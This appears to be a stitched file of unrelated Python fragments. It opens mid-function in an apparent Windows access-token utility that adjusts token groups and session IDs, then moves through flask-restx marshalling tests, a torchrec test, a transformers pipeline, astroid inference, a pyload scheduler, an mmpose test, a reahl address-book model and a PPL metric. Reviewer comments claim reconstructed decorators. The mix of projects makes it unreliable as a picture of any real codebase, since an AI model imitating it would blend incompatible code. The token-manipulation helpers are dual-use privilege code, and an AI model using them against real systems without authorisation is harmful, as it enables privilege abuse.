                    elif (aTokenInfo[aKey] == TOKEN_MANDATORY_POLICY_NEW_PROCESS_MIN):
                        print((tab + '- Mandatory Policy: {0}'.format('NEW_PROCESS_MIN')))
                    elif (aTokenInfo[aKey] == TOKEN_MANDATORY_POLICY_VALID_MASK):
                        print((tab + '- Mandatory Policy: {0}'.format('VALID_MASK')))
                else:
                    # Everything else is printed verbatim.
                    print((tab + '- {0}: {1}'.format(aKey, aTokenInfo[aKey])))
    return True
def closeAllHandles(allTokens):
    """Close every token handle stored in a {pid: [tokenDetails, ...]} dict."""
    logging.debug('Closing all handles to tokens...')
    for pid in allTokens:
        for tokenInfo in allTokens[pid]:
            TokenManager.closeHandle(tokenInfo['token'])
    logging.debug('All handles to tokens are closed')
    return True
def setTokenGroups(hToken, groups):
    """Adjust the group attributes of *hToken* via AdjustTokenGroups().

    groups -- dict mapping SID strings to the attribute flags to apply.
    Returns True on success, False on failure or when *groups* is empty.
    """
    logging.debug('Trying to Adjust Token Groups according to {0}'.format(groups))
    sids = list(groups.keys())
    # BUGFIX: the original tested 'groups == 0', which is never true for a
    # dict, so the empty-input guard was dead code; test emptiness instead.
    if not groups:
        logging.warning("'Groups' given to setTokenGroups() is empty. Nothing to do")
        return False
    newStateGroups = tokenGroups(len(groups))()
    newStateGroups.GroupCount = len(groups)
    for i in range(newStateGroups.GroupCount):
        aSIDstr = sids[i]
        attrSid = groups[aSIDstr]
        sidObject = PVOID()
        # Convert the textual SID to its binary form before storing it.
        status = ConvertStringSidToSidA(aSIDstr.encode(), pointer(sidObject))
        newStateGroups.Groups[i].Sid = sidObject
        newStateGroups.Groups[i].Attributes = attrSid
    status = AdjustTokenGroups(hToken, False, byref(newStateGroups), 0, None, None)
    if (status == 0):
        logging.error('Impossible AdjustTokenGroups: {0}'.format(getLastErrorMessage()))
        return False
    logging.debug('AdjustTokenGroups() status good')
    return True
def setTokenSession(hToken, sessionID):
    """Set the terminal-services session ID of *hToken* to *sessionID*.

    Returns True on success, False when SetTokenInformation() fails.
    """
    newSessionID = DWORD(sessionID)
    status = SetTokenInformation(hToken, TokenSessionId, byref(newSessionID), sizeof(DWORD))
    if (status == 0):
        logging.error('Impossible to set session ID of the token {0} to {1}: {2}'.format(hToken, sessionID, getLastErrorMessage()))
        return False
    else:
        logging.debug('Session ID of the token {0} has been set to {1}'.format(hToken, sessionID))
        return True
class MarshallingTest(object):
    """Tests for marshal()/marshal_with() field marshalling.

    NOTE(review): this source looks decompiled — decorators were mangled into
    bare statements ('_with(model)' instead of '@marshal_with(model)', a bare
    '.options(debug=True)' line, and missing '@property' on TestObject.fee,
    which made the assertions below unsatisfiable and one line a syntax
    error). The decorators are restored here; confirm against the upstream
    flask-restx test suite.
    """
    def test_marshal(self):
        model = OrderedDict([('foo', fields.Raw)])
        marshal_dict = OrderedDict([('foo', 'bar'), ('bat', 'baz')])
        output = marshal(marshal_dict, model)
        assert isinstance(output, dict)
        assert (not isinstance(output, OrderedDict))
        assert (output == {'foo': 'bar'})
    def test_marshal_wildcard_nested(self):
        nest = fields.Nested(OrderedDict([('thumbnail', fields.String), ('video', fields.String)]))
        wild = fields.Wildcard(nest)
        wildcard_fields = OrderedDict([('*', wild)])
        model = OrderedDict([('preview', fields.Nested(wildcard_fields))])
        sub_dict = OrderedDict([('9:16', {'thumbnail': 24, 'video': 12}), ('16:9', {'thumbnail': 25, 'video': 11}), ('1:1', {'thumbnail': 26, 'video': 10})])
        marshal_dict = OrderedDict([('preview', sub_dict)])
        output = marshal(marshal_dict, model)
        assert (output == {'preview': {'1:1': {'thumbnail': '26', 'video': '10'}, '16:9': {'thumbnail': '25', 'video': '11'}, '9:16': {'thumbnail': '24', 'video': '12'}}})
    def test_marshal_wildcard_list(self):
        wild = fields.Wildcard(fields.List(fields.String))
        wildcard_fields = OrderedDict([('*', wild)])
        model = OrderedDict([('preview', fields.Nested(wildcard_fields))])
        sub_dict = OrderedDict([('1:1', [1, 2, 3]), ('16:9', [4, 5, 6]), ('9:16', [7, 8, 9])])
        marshal_dict = OrderedDict([('preview', sub_dict)])
        output = marshal(marshal_dict, model)
        assert (output == {'preview': {'9:16': ['7', '8', '9'], '16:9': ['4', '5', '6'], '1:1': ['1', '2', '3']}})
    def test_marshal_with_envelope(self):
        model = OrderedDict([('foo', fields.Raw)])
        marshal_dict = OrderedDict([('foo', 'bar'), ('bat', 'baz')])
        output = marshal(marshal_dict, model, envelope='hey')
        assert (output == {'hey': {'foo': 'bar'}})
    def test_marshal_wildcard_with_envelope(self):
        wild = fields.Wildcard(fields.String)
        model = OrderedDict([('foo', fields.Raw), ('*', wild)])
        marshal_dict = OrderedDict([('foo', {'bat': 'baz'}), ('a', 'toto'), ('b', 'tata')])
        output = marshal(marshal_dict, model, envelope='hey')
        assert (output == {'hey': {'a': 'toto', 'b': 'tata', 'foo': {'bat': 'baz'}}})
    def test_marshal_with_skip_none(self):
        model = OrderedDict([('foo', fields.Raw), ('bat', fields.Raw), ('qux', fields.Raw)])
        marshal_dict = OrderedDict([('foo', 'bar'), ('bat', None)])
        output = marshal(marshal_dict, model, skip_none=True)
        assert (output == {'foo': 'bar'})
    def test_marshal_wildcard_with_skip_none(self):
        wild = fields.Wildcard(fields.String)
        model = OrderedDict([('foo', fields.Raw), ('*', wild)])
        marshal_dict = OrderedDict([('foo', None), ('bat', None), ('baz', 'biz'), ('bar', None)])
        output = marshal(marshal_dict, model, skip_none=True)
        assert (output == {'baz': 'biz'})
    def test_marshal_decorator(self):
        model = OrderedDict([('foo', fields.Raw)])
        # Restored decorator (was a bare '_with(model)' statement).
        @marshal_with(model)
        def try_me():
            return OrderedDict([('foo', 'bar'), ('bat', 'baz')])
        assert (try_me() == {'foo': 'bar'})
    def test_marshal_decorator_with_envelope(self):
        model = OrderedDict([('foo', fields.Raw)])
        @marshal_with(model, envelope='hey')
        def try_me():
            return OrderedDict([('foo', 'bar'), ('bat', 'baz')])
        assert (try_me() == {'hey': {'foo': 'bar'}})
    def test_marshal_decorator_with_skip_none(self):
        model = OrderedDict([('foo', fields.Raw), ('bat', fields.Raw), ('qux', fields.Raw)])
        @marshal_with(model, skip_none=True)
        def try_me():
            return OrderedDict([('foo', 'bar'), ('bat', None)])
        assert (try_me() == {'foo': 'bar'})
    def test_marshal_decorator_tuple(self):
        model = OrderedDict([('foo', fields.Raw)])
        @marshal_with(model)
        def try_me():
            headers = {'X-test': 123}
            return (OrderedDict([('foo', 'bar'), ('bat', 'baz')]), 200, headers)
        assert (try_me() == ({'foo': 'bar'}, 200, {'X-test': 123}))
    def test_marshal_decorator_tuple_with_envelope(self):
        model = OrderedDict([('foo', fields.Raw)])
        @marshal_with(model, envelope='hey')
        def try_me():
            headers = {'X-test': 123}
            return (OrderedDict([('foo', 'bar'), ('bat', 'baz')]), 200, headers)
        assert (try_me() == ({'hey': {'foo': 'bar'}}, 200, {'X-test': 123}))
    def test_marshal_decorator_tuple_with_skip_none(self):
        model = OrderedDict([('foo', fields.Raw), ('bat', fields.Raw), ('qux', fields.Raw)])
        @marshal_with(model, skip_none=True)
        def try_me():
            headers = {'X-test': 123}
            return (OrderedDict([('foo', 'bar'), ('bat', None)]), 200, headers)
        assert (try_me() == ({'foo': 'bar'}, 200, {'X-test': 123}))
    def test_marshal_field_decorator(self):
        model = fields.Raw
        # Restored decorator (was a bare '_with_field(model)' statement).
        @marshal_with_field(model)
        def try_me():
            return 'foo'
        assert (try_me() == 'foo')
    def test_marshal_field_decorator_tuple(self):
        model = fields.Raw
        @marshal_with_field(model)
        def try_me():
            return ('foo', 200, {'X-test': 123})
        assert (try_me() == ('foo', 200, {'X-test': 123}))
    def test_marshal_field(self):
        model = OrderedDict({'foo': fields.Raw()})
        marshal_fields = OrderedDict([('foo', 'bar'), ('bat', 'baz')])
        output = marshal(marshal_fields, model)
        assert (output == {'foo': 'bar'})
    def test_marshal_tuple(self):
        model = OrderedDict({'foo': fields.Raw})
        marshal_fields = OrderedDict([('foo', 'bar'), ('bat', 'baz')])
        output = marshal((marshal_fields,), model)
        assert (output == [{'foo': 'bar'}])
    def test_marshal_tuple_with_envelope(self):
        model = OrderedDict({'foo': fields.Raw})
        marshal_fields = OrderedDict([('foo', 'bar'), ('bat', 'baz')])
        output = marshal((marshal_fields,), model, envelope='hey')
        assert (output == {'hey': [{'foo': 'bar'}]})
    def test_marshal_tuple_with_skip_none(self):
        model = OrderedDict([('foo', fields.Raw), ('bat', fields.Raw), ('qux', fields.Raw)])
        marshal_fields = OrderedDict([('foo', 'bar'), ('bat', None)])
        output = marshal((marshal_fields,), model, skip_none=True)
        assert (output == [{'foo': 'bar'}])
    def test_marshal_nested(self):
        model = {'foo': fields.Raw, 'fee': fields.Nested({'fye': fields.String})}
        marshal_fields = {'foo': 'bar', 'bat': 'baz', 'fee': {'fye': 'fum'}}
        expected = {'foo': 'bar', 'fee': {'fye': 'fum'}}
        output = marshal(marshal_fields, model)
        assert (output == expected)
    def test_marshal_ordered(self):
        model = OrderedDict([('foo', fields.Raw), ('baz', fields.Raw), ('bar', fields.Raw)])
        marshal_fields = {'foo': 1, 'baz': 2, 'bar': 3}
        expected_ordered = OrderedDict([('foo', 1), ('baz', 2), ('bar', 3)])
        ordered_output = marshal(marshal_fields, model, ordered=True)
        assert (ordered_output == expected_ordered)
        unordered_output = marshal(marshal_fields, model)
        assert (not isinstance(unordered_output, OrderedDict))
    def test_marshal_nested_ordered(self):
        model = OrderedDict([('foo', fields.Raw), ('fee', fields.Nested({'fye': fields.String}))])
        marshal_fields = {'foo': 'bar', 'bat': 'baz', 'fee': {'fye': 'fum'}}
        expected = OrderedDict([('foo', 'bar'), ('fee', OrderedDict([('fye', 'fum')]))])
        output = marshal(marshal_fields, model, ordered=True)
        assert isinstance(output, OrderedDict)
        assert (output == expected)
        assert isinstance(output['fee'], OrderedDict)
    def test_marshal_nested_with_non_null(self):
        model = OrderedDict([('foo', fields.Raw), ('fee', fields.Nested(OrderedDict([('fye', fields.String), ('blah', fields.String)]), allow_null=False))])
        marshal_fields = [OrderedDict([('foo', 'bar'), ('bat', 'baz'), ('fee', None)])]
        output = marshal(marshal_fields, model)
        expected = [OrderedDict([('foo', 'bar'), ('fee', OrderedDict([('fye', None), ('blah', None)]))])]
        assert (output == expected)
    def test_marshal_nested_with_null(self):
        model = OrderedDict([('foo', fields.Raw), ('fee', fields.Nested(OrderedDict([('fye', fields.String), ('blah', fields.String)]), allow_null=True))])
        marshal_fields = OrderedDict([('foo', 'bar'), ('bat', 'baz'), ('fee', None)])
        output = marshal(marshal_fields, model)
        expected = OrderedDict([('foo', 'bar'), ('fee', None)])
        assert (output == expected)
    def test_marshal_nested_with_skip_none(self):
        model = OrderedDict([('foo', fields.Raw), ('fee', fields.Nested(OrderedDict([('fye', fields.String)]), skip_none=True))])
        marshal_fields = OrderedDict([('foo', 'bar'), ('bat', 'baz'), ('fee', None)])
        output = marshal(marshal_fields, model, skip_none=True)
        expected = OrderedDict([('foo', 'bar')])
        assert (output == expected)
    def test_allow_null_presents_data(self):
        model = OrderedDict([('foo', fields.Raw), ('fee', fields.Nested(OrderedDict([('fye', fields.String), ('blah', fields.String)]), allow_null=True))])
        marshal_fields = OrderedDict([('foo', 'bar'), ('bat', 'baz'), ('fee', {'blah': 'cool'})])
        output = marshal(marshal_fields, model)
        expected = OrderedDict([('foo', 'bar'), ('fee', OrderedDict([('fye', None), ('blah', 'cool')]))])
        assert (output == expected)
    def test_skip_none_presents_data(self):
        model = OrderedDict([('foo', fields.Raw), ('fee', fields.Nested(OrderedDict([('fye', fields.String), ('blah', fields.String), ('foe', fields.String)]), skip_none=True))])
        marshal_fields = OrderedDict([('foo', 'bar'), ('bat', 'baz'), ('fee', {'blah': 'cool', 'foe': None})])
        output = marshal(marshal_fields, model)
        expected = OrderedDict([('foo', 'bar'), ('fee', OrderedDict([('blah', 'cool')]))])
        assert (output == expected)
    def test_marshal_nested_property(self):
        class TestObject(object):
            # Restored '@property' (marshalling expects an attribute, not a bound method).
            @property
            def fee(self):
                return {'blah': 'cool'}
        model = OrderedDict([('foo', fields.Raw), ('fee', fields.Nested(OrderedDict([('fye', fields.String), ('blah', fields.String)]), allow_null=True))])
        obj = TestObject()
        obj.foo = 'bar'
        obj.bat = 'baz'
        output = marshal([obj], model)
        expected = [OrderedDict([('foo', 'bar'), ('fee', OrderedDict([('fye', None), ('blah', 'cool')]))])]
        assert (output == expected)
    def test_marshal_nested_property_with_skip_none(self):
        class TestObject(object):
            @property
            def fee(self):
                return {'blah': 'cool', 'foe': None}
        model = OrderedDict([('foo', fields.Raw), ('fee', fields.Nested(OrderedDict([('fye', fields.String), ('blah', fields.String), ('foe', fields.String)]), skip_none=True))])
        obj = TestObject()
        obj.foo = 'bar'
        obj.bat = 'baz'
        output = marshal([obj], model)
        expected = [OrderedDict([('foo', 'bar'), ('fee', OrderedDict([('blah', 'cool')]))])]
        assert (output == expected)
    def test_marshal_list(self):
        model = OrderedDict([('foo', fields.Raw), ('fee', fields.List(fields.String))])
        marshal_fields = OrderedDict([('foo', 'bar'), ('bat', 'baz'), ('fee', ['fye', 'fum'])])
        output = marshal(marshal_fields, model)
        expected = OrderedDict([('foo', 'bar'), ('fee', ['fye', 'fum'])])
        assert (output == expected)
    def test_marshal_list_of_nesteds(self):
        model = OrderedDict([('foo', fields.Raw), ('fee', fields.List(fields.Nested({'fye': fields.String})))])
        marshal_fields = OrderedDict([('foo', 'bar'), ('bat', 'baz'), ('fee', {'fye': 'fum'})])
        output = marshal(marshal_fields, model)
        expected = OrderedDict([('foo', 'bar'), ('fee', [OrderedDict([('fye', 'fum')])])])
        assert (output == expected)
    def test_marshal_list_of_lists(self):
        model = OrderedDict([('foo', fields.Raw), ('fee', fields.List(fields.List(fields.String)))])
        marshal_fields = OrderedDict([('foo', 'bar'), ('bat', 'baz'), ('fee', [['fye'], ['fum']])])
        output = marshal(marshal_fields, model)
        expected = OrderedDict([('foo', 'bar'), ('fee', [['fye'], ['fum']])])
        assert (output == expected)
    def test_marshal_nested_dict(self):
        model = OrderedDict([('foo', fields.Raw), ('bar', OrderedDict([('a', fields.Raw), ('b', fields.Raw)]))])
        marshal_fields = OrderedDict([('foo', 'foo-val'), ('bar', 'bar-val'), ('bat', 'bat-val'), ('a', 1), ('b', 2), ('c', 3)])
        output = marshal(marshal_fields, model)
        expected = OrderedDict([('foo', 'foo-val'), ('bar', OrderedDict([('a', 1), ('b', 2)]))])
        assert (output == expected)
    # BUGFIX: the original had a bare '.options(debug=True)' here — a syntax
    # error. Restored the pytest marker; confirm the file imports pytest.
    @pytest.mark.options(debug=True)
    def test_will_prettyprint_json_in_debug_mode(self, app, client):
        api = Api(app)
        class Foo1(Resource):
            def get(self):
                return {'foo': 'bar', 'baz': 'asdf'}
        api.add_resource(Foo1, '/foo', endpoint='bar')
        foo = client.get('/foo')
        lines = foo.data.splitlines()
        lines = [line.decode() for line in lines]
        assert ('{' == lines[0])
        assert lines[1].startswith(' ')
        assert lines[2].startswith(' ')
        assert ('}' == lines[3])
        assert foo.data.endswith(b'\n')
    def test_json_float_marshalled(self, app, client):
        api = Api(app)
        class FooResource(Resource):
            fields = {'foo': fields.Float}
            def get(self):
                return marshal({'foo': 3.0}, self.fields)
        api.add_resource(FooResource, '/api')
        resp = client.get('/api')
        assert (resp.status_code == 200)
        assert (resp.data.decode('utf-8') == '{"foo": 3.0}\n')
def _test_sharding_from_meta(tables: List[EmbeddingBagConfig], rank: int, world_size: int, sharder: ModuleSharder[nn.Module], backend: str, local_size: Optional[int]=None, use_fp_collection: bool=False) -> None:
    """Shard a meta-device-initialized module and verify feature-processor params materialized.

    Runs inside a MultiProcessContext for the given rank/world_size/backend and
    checks every '_feature_processors' parameter in the sharded state dict.
    """
    with MultiProcessContext(rank, world_size, backend, local_size) as ctx:
        (sparse_arch, sharded_sparse_arch) = get_unsharded_and_sharded_module(tables, sharder, use_dmp=True, use_fp_collection=use_fp_collection, init_device=torch.device('meta'), ctx=ctx)
        state_dict = sharded_sparse_arch.state_dict()
        for (key, param) in state_dict.items():
            # Only feature-processor parameters are checked here.
            if ('_feature_processors' not in key):
                continue
            assert (not param.is_meta), f'Parameter {key} is still meta after sharding'
            # Materialized feature-processor weights are expected to be all ones.
            torch.testing.assert_close(param, torch.ones_like(param))
class PairClassificationPipeline(Pipeline):
    """Pipeline that classifies a pair of texts (e.g. premise / hypothesis)."""

    def _sanitize_parameters(self, **kwargs):
        # Only "second_text" is recognized, and it is routed to preprocess.
        preprocess_kwargs = {}
        if 'second_text' in kwargs:
            preprocess_kwargs['second_text'] = kwargs['second_text']
        return preprocess_kwargs, {}, {}

    def preprocess(self, text, second_text=None):
        # Tokenize both texts together as a single paired input.
        return self.tokenizer(text, text_pair=second_text, return_tensors=self.framework)

    def _forward(self, model_inputs):
        return self.model(**model_inputs)

    def postprocess(self, model_outputs):
        # Convert logits -> probabilities, pick the best class, and report
        # its label, score, and the raw logits.
        raw_logits = model_outputs.logits[0].numpy()
        probabilities = softmax(raw_logits)
        best_class = np.argmax(probabilities)
        return {
            'label': self.model.config.id2label[best_class],
            'score': probabilities[best_class].item(),
            'logits': raw_logits.tolist(),
        }
def _float_to_int(api: CheckerPluginInterface, typ: Type) -> Type:
    """Recursively replace ``builtins.float`` with ``builtins.int`` in *typ*."""
    typ = get_proper_type(typ)
    if not isinstance(typ, Instance):
        # Non-instance types (unions, callables, ...) are left untouched.
        return typ
    if typ.type.fullname == 'builtins.float':
        return api.named_generic_type('builtins.int', [])
    if typ.args:
        # Rewrite type arguments recursively (e.g. list[float] -> list[int]).
        converted = [_float_to_int(api, arg) for arg in typ.args]
        return typ.copy_modified(args=converted)
    return typ
def test_close(win32rawprinter, caplog, mocker):
    """Win32Raw.close() should log the closure and reset the device handle.

    All win32print entry points are mocked, so no real printer is touched.
    """
    # An integer 0 stands in for the opaque PyPrinterHANDLE object.
    PyPrinterHANDLE = mocker.Mock()
    PyPrinterHANDLE.return_value = 0
    mocker.patch('escpos.printer.Win32Raw.printers', new={'test_printer': 'Test'})
    win32rawprinter.printer_name = 'test_printer'
    assert (win32rawprinter.printer_name in win32rawprinter.printers)
    mocker.patch('win32print.OpenPrinter', new=PyPrinterHANDLE)
    win32rawprinter.open()
    with caplog.at_level(logging.INFO):
        # Stub out the teardown calls that close() makes.
        mocker.patch('win32print.EndPagePrinter')
        mocker.patch('win32print.EndDocPrinter')
        mocker.patch('win32print.ClosePrinter')
        win32rawprinter.close()
        assert ('Closing' in caplog.text)
        # close() is expected to mark the device as released.
        assert (win32rawprinter._device is False)
def check_filter(qdmr_args, i_op, qdmr, change_stage=0):
    """Validate a 'filter' QDMR op and split "between X and Y" conditions.

    Returns (ok, corrected): ok is False when the args are malformed or a
    between-phrase was found; corrected is a rewritten QDMR (or None) where
    the between-condition is split into two chained filter ops.

    NOTE(review): ``change_stage`` appears unused here -- presumably kept for
    signature parity with sibling checkers; confirm.
    """
    ok = True
    corrected = None
    # A filter op takes exactly two args: a QDMR reference and a condition.
    ok = (ok and (len(qdmr_args) == 2))
    ok = (ok and QdmrInstance.is_good_qdmr_ref(qdmr_args[0], i_op))
    matches = re.findall(BETWEEN_RE_PATTERN, qdmr_args[1], flags=re.IGNORECASE)
    if matches:
        ok = False
        group = matches[0]
        # First half: "<prefix> betweenleftside <left-bound>" inserted at i_op.
        corrected = insert_qdmr_op('filter', [qdmr_args[0], ' '.join([group[0].strip(), 'betweenleftside', group[1].strip()]).strip()], i_op, qdmr)
        # Second half: the original op (shifted to i_op + 1) filters the
        # inserted op's result on "<prefix> betweenrightside <right-bound>".
        corrected.ops[(i_op + 1)] = 'filter'
        corrected.args[(i_op + 1)] = [QdmrInstance.index_to_ref(i_op), ' '.join([group[0].strip(), 'betweenrightside', group[2].strip()]).strip()]
    return (ok, corrected)
def _get_namedtuple_fields(node: nodes.Call) -> str:
    """Derive the field-names string for a namedtuple() call being inferred.

    Handles both the positional form ``namedtuple(name, field_names)`` and the
    keyword form ``namedtuple(name, field_names=...)``; also accepts the
    typing.NamedTuple style where each element is a (name, type) pair.

    Raises UseInferenceDefault whenever the fields cannot be statically
    determined, letting astroid fall back to default inference.
    """
    names = []
    container = None
    try:
        container = next(node.args[1].infer())
    except (InferenceError, StopIteration) as exc:
        raise UseInferenceDefault from exc
    except IndexError:
        # No second positional arg -- fields may arrive as a keyword instead.
        pass
    if (not container):
        for keyword_node in node.keywords:
            if (keyword_node.arg == 'field_names'):
                try:
                    container = next(keyword_node.value.infer())
                except (InferenceError, StopIteration) as exc:
                    raise UseInferenceDefault from exc
                break
    if (not isinstance(container, nodes.BaseContainer)):
        raise UseInferenceDefault
    for elt in container.elts:
        if isinstance(elt, nodes.Const):
            # Plain string field name.
            names.append(elt.as_string())
            continue
        if (not isinstance(elt, (nodes.List, nodes.Tuple))):
            raise UseInferenceDefault
        if (len(elt.elts) != 2):
            raise UseInferenceDefault
        # typing.NamedTuple style (name, type) pair: keep only the name.
        names.append(elt.elts[0].as_string())
    if names:
        field_names = f"({','.join(names)},)"
    else:
        field_names = ''
    return field_names
class Scheduler():
    """Schedules callables to run at (or after) an absolute point in time.

    Jobs live in a priority queue ordered by due time; ``run`` is expected
    to be driven repeatedly by a worker loop.
    """

    def __init__(self, core):
        self.pyload = core
        self._ = core._
        self.queue = PriorityQueue()

    def add_job(self, t, call, args=None, kwargs=None, threaded=True):
        """Schedule *call* to run *t* seconds from now; return its Deferred.

        Fix: the original used mutable default arguments (``args=[]``,
        ``kwargs={}``), which are shared between all calls -- any mutation
        would leak into later jobs. Replaced with None sentinels.
        """
        if args is None:
            args = []
        if kwargs is None:
            kwargs = {}
        t += time.time()
        d = Deferred()
        j = Job(t, call, args, kwargs, d, threaded)
        self.queue.put((t, j))
        return d

    def remove_job(self, d):
        """Remove the queued job whose deferred is *d*; return True if found."""
        index = (- 1)
        for (i, j) in enumerate(self.queue):
            # Queue entries are (time, Job) tuples.
            if (j[1].deferred == d):
                index = i
        if (index >= 0):
            del self.queue[index]
            return True
        return False

    def run(self):
        """Pop due jobs and start them; re-queue the first not-yet-due job."""
        while True:
            (t, j) = self.queue.get()
            if (not j):
                # A falsy entry acts as a stop sentinel.
                break
            elif (t <= time.time()):
                j.start()
            else:
                # Not due yet -- put it back and stop for this cycle.
                self.queue.put((t, j))
                break
def test_top_down_JHMDB_dataset_compatibility():
    """Deprecated construction of TopDownJhmdbDataset still works.

    Builds the dataset from test fixtures, checks basic metadata, and runs
    PCK / tPCK evaluation on ground-truth-derived outputs (expecting perfect
    scores).
    """
    dataset = 'TopDownJhmdbDataset'
    dataset_class = DATASETS.get(dataset)
    dataset_class.load_annotations = MagicMock()
    dataset_class.coco = MagicMock()
    # JHMDB has 15 joints, all of them used for inference.
    channel_cfg = dict(num_output_channels=15, dataset_joints=15, dataset_channel=[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]], inference_channel=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14])
    data_cfg = dict(image_size=[192, 256], heatmap_size=[48, 64], num_output_channels=channel_cfg['num_output_channels'], num_joints=channel_cfg['dataset_joints'], dataset_channel=channel_cfg['dataset_channel'], inference_channel=channel_cfg['inference_channel'], soft_nms=False, nms_thr=1.0, oks_thr=0.9, vis_thr=0.2, use_gt_bbox=True, det_bbox_thr=0.0, bbox_file='')
    # use_gt_bbox=False without a bbox_file must fail the dataset's checks.
    with pytest.raises(AssertionError):
        data_cfg_copy = copy.deepcopy(data_cfg)
        data_cfg_copy['use_gt_bbox'] = False
        with pytest.warns(DeprecationWarning):
            _ = dataset_class(ann_file='tests/data/jhmdb/test_jhmdb_sub1.json', img_prefix='tests/data/jhmdb/', data_cfg=data_cfg_copy, pipeline=[], test_mode=True)
        with pytest.warns(DeprecationWarning):
            _ = dataset_class(ann_file='tests/data/jhmdb/test_jhmdb_sub1.json', img_prefix='tests/data/jhmdb/', data_cfg=data_cfg_copy, pipeline=[], test_mode=False)
    # Deprecated construction should still warn but succeed.
    with pytest.warns(DeprecationWarning):
        custom_dataset = dataset_class(ann_file='tests/data/jhmdb/test_jhmdb_sub1.json', img_prefix='tests/data/jhmdb/', data_cfg=data_cfg, pipeline=[], test_mode=True)
    assert (custom_dataset.test_mode is True)
    assert (custom_dataset.dataset_name == 'jhmdb')
    image_id = 2290001
    assert (image_id in custom_dataset.img_ids)
    assert (len(custom_dataset.img_ids) == 3)
    _ = custom_dataset[0]
    # Outputs built from ground truth should evaluate to perfect scores.
    outputs = convert_db_to_output(custom_dataset.db)
    with tempfile.TemporaryDirectory() as tmpdir:
        infos = custom_dataset.evaluate(outputs, tmpdir, ['PCK'])
        assert_almost_equal(infos['Mean PCK'], 1.0)
        infos = custom_dataset.evaluate(outputs, tmpdir, ['tPCK'])
        assert_almost_equal(infos['Mean tPCK'], 1.0)
        # mAP is not a supported metric for this dataset.
        with pytest.raises(KeyError):
            _ = custom_dataset.evaluate(outputs, tmpdir, 'mAP')
class AddressBook(Base):
    """An address book owned by one account and optionally shared with others.

    Sharing is modelled via Collaborator rows carrying per-collaborator
    can_add / can_edit permissions.

    NOTE(review): by_id / owned_by / address_books_visible_to take ``cls`` --
    they look like @classmethod definitions whose decorators were lost in
    extraction; confirm against the original source.
    """

    __tablename__ = 'access_address_book'

    id = Column(Integer, primary_key=True)
    owner_id = Column(Integer, ForeignKey(EmailAndPasswordSystemAccount.id), nullable=False)
    owner = relationship(EmailAndPasswordSystemAccount)
    collaborators = relationship('reahl.doc.examples.tutorial.accessbootstrap.accessbootstrap.Collaborator', lazy='dynamic', backref='address_book')

    def by_id(cls, address_book_id, exception_to_raise):
        # Raise the caller-supplied exception unless exactly one book matches.
        address_books = Session.query(cls).filter_by(id=address_book_id)
        if (address_books.count() != 1):
            raise exception_to_raise
        return address_books.one()

    def owned_by(cls, account):
        return Session.query(cls).filter_by(owner=account)

    def address_books_visible_to(cls, account):
        # Books shared with the account plus the ones it owns outright.
        visible_books = Session.query(cls).join(Collaborator).filter((Collaborator.account == account)).all()
        visible_books.extend(cls.owned_by(account))
        return visible_books

    fields = ExposedNames()
    fields.chosen_collaborator = (lambda i: ChoiceField([Choice(i.id, IntegerField(label=i.email)) for i in Session.query(EmailAndPasswordSystemAccount).all()], label='Choose collaborator'))
    fields.may_edit_address = (lambda i: BooleanField(label='May edit existing addresses'))
    fields.may_add_address = (lambda i: BooleanField(label='May add new addresses'))

    events = ExposedNames()
    events.add_collaborator = (lambda i: Event(label='Share', action=Action(i.add_collaborator)))

    def add_collaborator(self):
        # Share this book with the account chosen via the exposed fields.
        chosen_account = Session.query(EmailAndPasswordSystemAccount).filter_by(id=self.chosen_collaborator).one()
        self.allow(chosen_account, can_add_addresses=self.may_add_address, can_edit_addresses=self.may_edit_address)

    def addresses(self):
        return Session.query(Address).filter_by(address_book=self).all()

    def display_name(self):
        return ('Address book of %s' % self.owner.email)

    def allow(self, account, can_add_addresses=False, can_edit_addresses=False):
        # Replace any existing collaboration for this account with a new one.
        Session.query(Collaborator).filter_by(address_book=self, account=account).delete()
        Collaborator(address_book=self, account=account, can_add_addresses=can_add_addresses, can_edit_addresses=can_edit_addresses)

    def can_be_edited_by(self, account):
        if (account is self.owner):
            return True
        collaborator = self.get_collaborator(account)
        # Add rights imply edit rights.
        return ((collaborator and collaborator.can_edit_addresses) or self.can_be_added_to_by(account))

    def can_be_added_to_by(self, account):
        if (account is self.owner):
            return True
        collaborator = self.get_collaborator(account)
        return (collaborator and collaborator.can_add_addresses)

    def can_be_added_to(self):
        account = LoginSession.for_current_session().account
        return self.can_be_added_to_by(account)

    def collaborators_can_be_added_by(self, account):
        # Only the owner may share the book with new collaborators.
        return (self.owner is account)

    def collaborators_can_be_added(self):
        account = LoginSession.for_current_session().account
        return self.collaborators_can_be_added_by(account)

    def is_visible_to(self, account):
        return (self in self.address_books_visible_to(account))

    def is_visible(self):
        account = LoginSession.for_current_session().account
        return self.is_visible_to(account)

    def get_collaborator(self, account):
        # Return the single Collaborator row for this account, or None.
        collaborators = self.collaborators.filter_by(account=account)
        count = collaborators.count()
        if (count == 1):
            return collaborators.one()
        if (count > 1):
            raise ProgrammerError('There can be only one Collaborator per account. Here is more than one.')
        return None
class PPL():
    """Perceptual Path Length (PPL) metric.

    Measures generator smoothness as the LPIPS distance between images
    generated from latent pairs separated by a small epsilon, scaled by
    1 / epsilon**2 and averaged after trimming 1st/99th percentile outliers.
    """

    # Fractional crop box for the FFHQ face region (per-dim min/max pairs).
    FFHQ_CROP = [((1 / 8) * 3), ((1 / 8) * 7), ((1 / 8) * 2), ((1 / 8) * 6)]

    def __init__(self, G, prior_generator, device=None, num_samples=50000, epsilon=0.0001, use_dlatent=True, full_sampling=False, crop=None, lpips_model=None, lpips_size=None):
        device_ids = []
        if isinstance(G, torch.nn.DataParallel):
            device_ids = G.device_ids
            G = utils.unwrap_module(G)
        assert isinstance(G, models.Generator)
        assert isinstance(prior_generator, utils.PriorGenerator)
        if (device is None):
            # Infer the device from the model when not given explicitly.
            device = next(G.parameters()).device
        else:
            device = torch.device(device)
        assert (torch.device(prior_generator.device) == device), (('Prior generator device ({}) '.format(torch.device(prior_generator)) + 'is not the same as the specified (or infered from the model)') + 'device ({}) for the PPL evaluation.'.format(device))
        G.eval().to(device)
        self.G_mapping = G.G_mapping
        self.G_synthesis = G.G_synthesis
        if device_ids:
            # Re-wrap the submodules for multi-GPU evaluation.
            self.G_mapping = torch.nn.DataParallel(self.G_mapping, device_ids=device_ids)
            self.G_synthesis = torch.nn.DataParallel(self.G_synthesis, device_ids=device_ids)
        self.prior_generator = prior_generator
        self.device = device
        self.num_samples = num_samples
